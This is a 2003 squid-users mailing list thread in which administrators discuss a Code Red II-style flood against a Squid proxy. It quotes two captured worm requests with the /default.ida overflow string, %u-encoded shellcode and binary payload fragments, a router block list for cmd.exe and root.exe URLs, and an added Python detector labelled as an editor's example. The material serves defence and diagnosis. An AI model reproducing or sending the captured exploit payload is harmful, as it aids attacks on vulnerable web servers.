Re: [squid-users] New Code Red?

From: MASOOD AHMAD <[email protected]>
Date: Thu, 3 Apr 2003 08:11:49 -0800 (PST)

I think for this you will have to deny it from your
border router like this:

Router(config)#class-map match-any http-hacks
Router(config-cmap)#match protocol http url "*.ida*"
Router(config-cmap)#match protocol http url "*cmd.exe*"
Router(config-cmap)#match protocol http url "*root.exe*"

here yours

Router(config-cmap)#match protocol http url "XXXXXXXXXXXXX"

I think it will work...

Best Regards,
Masood Ahmad Shah
System Administrator
Fibre Net
Lahore, Pakistan
Mobile# +92423004277367

--- Wei Keong <chooweikeong@pacific.net.sg> wrote:
> Hi,
>
> We are seeing a possible new Code Red. Each victim will flood
> a particular destination. Unlike the original one, this one
> does not send a proper HTTP method. Although Squid will return
> Bad Request, this attack will consume a lot of resources and
> bring down the Squid box...
>
> Anybody catching the same thing? It seems to us that DENIED/403
> requires less processing than returning NONE/400 or NONE/411.
> If this is true, is there any way to deny these requests?
>
>
> GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> X%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u685
> 8%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53f
> f%u0078%u0000%u00=a HTTP/1.0..Content-type: text/xml.Content-length: 3379
> ........`........dg.6..dg.&.......h......\...
> P.U...\...P.U..@.....X....U.=.......=..............T....u..~
> 0...........F0.........CodeRedII...$.U.f.....8.....P.......j
> ...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,.
> .............F4.E.Pj..u...........j.j..U.P.U.Ou..;...i.T....
> \&....\&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=....
> s....>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E.
> j.Th~f...u..U.Yj...p...P.u..U........tK3..U.=3'..u?..h......
> ...l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f
> ...u..U.Y...u1.....X-....j.h....P.u..U.=....u.j.j...\...P.u.
> .U..u..U..........w...........xu......`......d$.dg....Xa..dg
> .6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I.r
> ...A..<.GetPu..|..rocAu..J.I...J$........J.......D$$dg...
> .Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread.
> .u..U..E......GetTickCount..u..U..E......Sleep..u..U..E.....
> .GetSystemDefaultLangID..u..U..E......GetSystemDirectoryA..u
> ..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E......GlobalAddAtomA
>
>
> Squid 2.4S6 reply: HTTP/1.0 411 Length Required.
>
>
>
>
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780
> 1%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
> 0%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0..Host: xxx.xx.xxx.xx..Content-type: text/xml.Content-length: 3379..Cache-Control:
> max-stale=0........`........dg.6..dg.&.......h......\...
> P.U...\...P.U..@.....X....U.=.......=..............T....u..~
> 0...........F0.........CodeRedII...$.U.f.....8.....P.......j
> ...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,.
> .............F4.E.Pj..u...........j.j..U.P.U.Ou..;...i.T....
> \&....\&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=....
> s....>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E.
> j.Th~f...u..U.Yj...p...P.u..U........tK3..U.=3'..u?..h......
> ...l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f
> ...u..U.Y...u1.....X-....j.h....P.u..U.=....u.j.j...\...P.u.
> .U..u..U..........w...........xu......`......d$.dg....Xa..dg
> .6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I.r
> ...A..<.GetPu..|..rocAu..J.I...J$........J.......D$$dg...
> .Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread.
> .u..U..E......GetTickCount..u..U..E......Sleep..u..U..E.....
> .GetSystemDefaultLangID..u..U..E......GetSystemDirectoryA..u
> ..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E......Global
>
>
> Squid 2.4S6 reply: HTTP/1.0 400 Bad Request.
>
>
>
> Thanks,
> Wei Keong
>
>
>
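Editor's added example, not code from either poster: a small Python helper that classifies proxy request lines using the signature visible in the quoted capture (a target starting with `/default.ida?`, a long run of `X` padding, then `%uXXXX`-encoded words) and tallies hits per source address so the flooding clients can be identified and handed to an upstream block rule such as the router class-map above. The record format (source address, first request line) and all sample lines are constructed assumptions, not Squid's own log format; it deliberately tokenises the line rather than demanding a well-formed `METHOD target HTTP/x.y`, since the report says the variant does not always send a proper method.

```python
import re
from collections import Counter

# Signature taken from the captured request quoted in the thread: the target
# begins with /default.ida? followed by a long run of 'X' padding and then
# %uXXXX-encoded words (%u9090%u6858...). Requiring both parts keeps an
# ordinary /default.ida probe from being counted as a worm hit.
CODE_RED_TARGET_RE = re.compile(r"^/default\.ida\?X{20,}.*?%u[0-9a-f]{4}", re.IGNORECASE)


def is_code_red_request(request_line: str) -> bool:
    """True if any whitespace-separated token of the request line carries the
    Code Red style target. Tokenising instead of strictly parsing
    'METHOD target HTTP/x.y' matters: a request with a missing or bogus method
    still gets flagged, which is exactly the case that costs Squid a 400/411."""
    return any(CODE_RED_TARGET_RE.match(tok) for tok in request_line.split())


def tally_sources(records):
    """records: iterable of (source_ip, request_line) pairs.
    Returns a Counter of flagged request counts per source address."""
    hits = Counter()
    for source, line in records:
        if is_code_red_request(line):
            hits[source] += 1
    return hits


def flooding_sources(records, threshold=2):
    """Source addresses whose flagged-request count reaches the threshold,
    sorted by count (descending) then address, ready for an upstream block."""
    hits = tally_sources(records)
    ranked = sorted(hits.items(), key=lambda kv: (-kv[1], kv[0]))
    return [src for src, n in ranked if n >= threshold]


# Constructed sample input (assumption, not real capture data): the source
# address plus the first line of the request as the proxy would see it.
X_PAD = "X" * 224
WORM_TARGET = "/default.ida?" + X_PAD + "%u9090%u6858%ucbd3%u7801%u9090%u9090%u00=a"
SAMPLE_RECORDS = [
    ("192.0.2.10", "GET " + WORM_TARGET + " HTTP/1.0"),
    ("192.0.2.10", "GET " + WORM_TARGET + " HTTP/1.0"),
    ("192.0.2.11", WORM_TARGET + " HTTP/1.0"),           # method missing
    ("198.51.100.5", "GET http://www.example.com/ HTTP/1.0"),
    ("198.51.100.6", "GET /default.ida HTTP/1.0"),       # probe without payload
]

if __name__ == "__main__":
    for src, n in tally_sources(SAMPLE_RECORDS).items():
        print(f"{src}\t{n} flagged request(s)")
    print("block upstream:", flooding_sources(SAMPLE_RECORDS))
```

Feeding it a real stream of (client, request-line) pairs from a packet capture in front of the proxy gives a list of addresses to drop at the border, which is cheaper than letting Squid parse and reject each request.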

Received on Thu Apr 03 2003 - 09:12:29 MST

This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 17:14:39 MST